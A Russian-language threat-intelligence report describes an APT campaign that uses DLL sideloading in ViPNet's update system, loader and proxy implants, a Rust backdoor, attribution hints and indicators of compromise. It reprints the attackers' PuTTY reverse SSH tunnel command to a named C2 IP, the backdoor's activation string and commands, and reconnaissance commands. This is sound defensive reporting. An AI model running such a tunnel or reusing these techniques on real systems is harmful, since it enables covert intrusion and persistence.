Новая APT-кампания использует систему обновления ViPNet для атак на российские организации

information security

С мая 2026 года в российском киберпространстве действует ранее неизвестная продвинутая угроза, направленная на крупные организации государственного, энергетического, транспортного, образовательного, логистического и промышленного секторов. Атака примечательна использованием инструментария, который запускается через легитимный механизм обновления программного комплекса ViPNet (система для создания защищённых сетей). Злоумышленники реализуют закрепление на заражённых хостах с помощью подмены библиотек - техники DLL Sideloading. Это не первый случай, когда под удар попадают машины с ViPNet: в прошлом году исследователи уже фиксировали сложный бэкдор, маскировавшийся под обновления этого продукта.

Описание

В ходе анализа одной из скомпрометированных систем был обнаружен вредоносный файл wtsapi32.dll, размещённый в каталоге C:\Program Files (x86)\InfoTeCS\VIPNet Update System, относящемся к компоненту обновления. Исполняемый файл системы обновлений itcsrvup64.exe, запускающийся при старте операционной системы, загружает эту библиотеку. Таким образом, атакующие добиваются автоматического запуска вредоносного кода на каждом старте - классический способ закрепления в системе. Обнаруженный компонент получил название HelloInjector.

HelloInjector представляет собой загрузчик, задача которого - внедрить свой код в процесс svchost.exe и затем выполнить полезную нагрузку. Механизм внедрения использует функции NtWriteVirtualMemory и NtCreateThreadEx. После успешной инъекции загрузчик проверяет имя процесса: если оно содержит строку svchost, а командная строка - netsvcs, то HelloInjector извлекает из своего тела открытым текстом хранящуюся полезную нагрузку и запускает её в памяти.

Эта нагрузка, названная HelloProxy, выполняет две функции: скрытое проксирование трафика и загрузку следующих модулей с командного сервера. Перехват системных функций NtDeviceIoControlFile, closesocket и shutdown осуществляется с помощью библиотеки Microsoft Detours. Обработчики closesocket и shutdown предотвращают преждевременное закрытие сокетов, используемых для связи с командно-контрольным (C2) сервером. Основная логика сосредоточена в перехватчике NtDeviceIoControlFile, который обрабатывает два IOCTL-кода: AFD_RECV (0x12017) и AFD_GET_TDI_HANDLES (0x12037). Эти коды применяются при работе с сокетами; их перехват позволяет обходить защитные решения, фильтрующие сетевые подключения на уровне пользователя. Средства защиты "Лаборатории Касперского" обнаруживают подобную активность и блокируют заражение на всех этапах.

После установки перехватчиков HelloProxy начинает прослушивать порты 5003 и 5060, ожидая команд от C2-сервера. Для идентификации легитимного трафика имплант реализует рукопожатие: отправляет два байта 0x0502 и ожидает ответа, содержащего строку ASDFASFSAFASDF. Согласно анализу экспертов, успешное рукопожатие запускает одну из двух ветвей: работа в качестве прокси (перенаправление трафика между сокетами) или загрузка и выполнение полученного от сервера исполняемого файла непосредственно в памяти загрузчика.

В ходе исследования были обнаружены две дополнительные вредоносные нагрузки, которые, вероятно, были внедрены в процесс svchost через HelloInjector. Первая, HelloExecutor, даёт атакующим возможность выполнять команды на заражённой системе. С её помощью злоумышленники проводили разведку: выполняли команды query user, ipconfig /all, net user /do, net group /do, а также проверяли содержимое каталогов, связанных с ViPNet. Вторая нагрузка, HelloCleaner, предназначена для очистки журналов ViPNet, что позволяет скрыть следы присутствия.

Примечательно, что в ходе разведки фигурировала директория C:\Users\Public\Music. Как выяснили исследователи, на заражённых машинах злоумышленники использовали этот каталог для запуска SSH-туннеля с помощью переименованного клиента PuTTY. Команда выглядела следующим образом: C:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted]. Таким образом устанавливалось зашифрованное соединение с командным сервером.

Помимо описанного инструментария, на одной из скомпрометированных систем был найден бэкдор на языке Rust, названный HelloBackdoor. Он прослушивает 443-й порт и активируется при получении строки 47c6235b4d2611184 (половина MD5-хэша от "hello\n"). Бэкдор поддерживает команды !upload (загрузка файла на атакуемую машину), !down (выгрузка файла), !stop (остановка через создание и запуск BAT-файла, который перезапускает службу iplircontrol). Любая другая введённая строка исполняется через cmd.exe.

Атрибуция кампании остаётся неоднозначной. В одном из образцов wtsapi32.dll обнаружена неиспользуемая строка с HTTP-запросом к новостному порталу sina.com, популярному в Китае. Кроме того, при компиляции бэкдора HelloBackdoor использовалось зеркало Rust-пакетов mirrors.ustc.edu.cn. Эти признаки могут указывать на китайскоязычных злоумышленников, но не исключают преднамеренной подстановки "ложных флагов". На данный момент исследователи с низкой степенью уверенности связывают кампанию с неизвестной APT-группировкой.

Учитывая, что ПО ViPNet вновь привлекло внимание продвинутых атакующих, организациям, использующим этот комплекс, рекомендуется усилить мониторинг. В частности, следует контролировать сетевой трафик на портах 5003, 5060 и 443, а также обращать внимание на подозрительную активность в каталогах C:\Users\Public\Music и C:\Program Files (x86)\InfoTeCS\VIPNet Update System. Современные SIEM-системы и средства защиты конечных точек способны выявлять описанные техники, включая перехват IOCTL-кодов и инъекцию в svchost. При обнаружении индикаторов компрометации необходимо незамедлительно изолировать заражённые хосты и провести полное сканирование инфраструктуры.

Индикаторы компрометации

IPv4

  • 5.39.253.206

MD5

  • 0cfdffc56f0fa325d0c4d24780b46597
  • 16c211c96735f2fae9361b89bd7a31bf
  • 1bfe2b9493128574907a8279256a8bcc
  • 9f5606a0755bc633b9bd7db6d179c09e
  • b103cd21280b4061f88b2bcc51394894

Комментарии: 0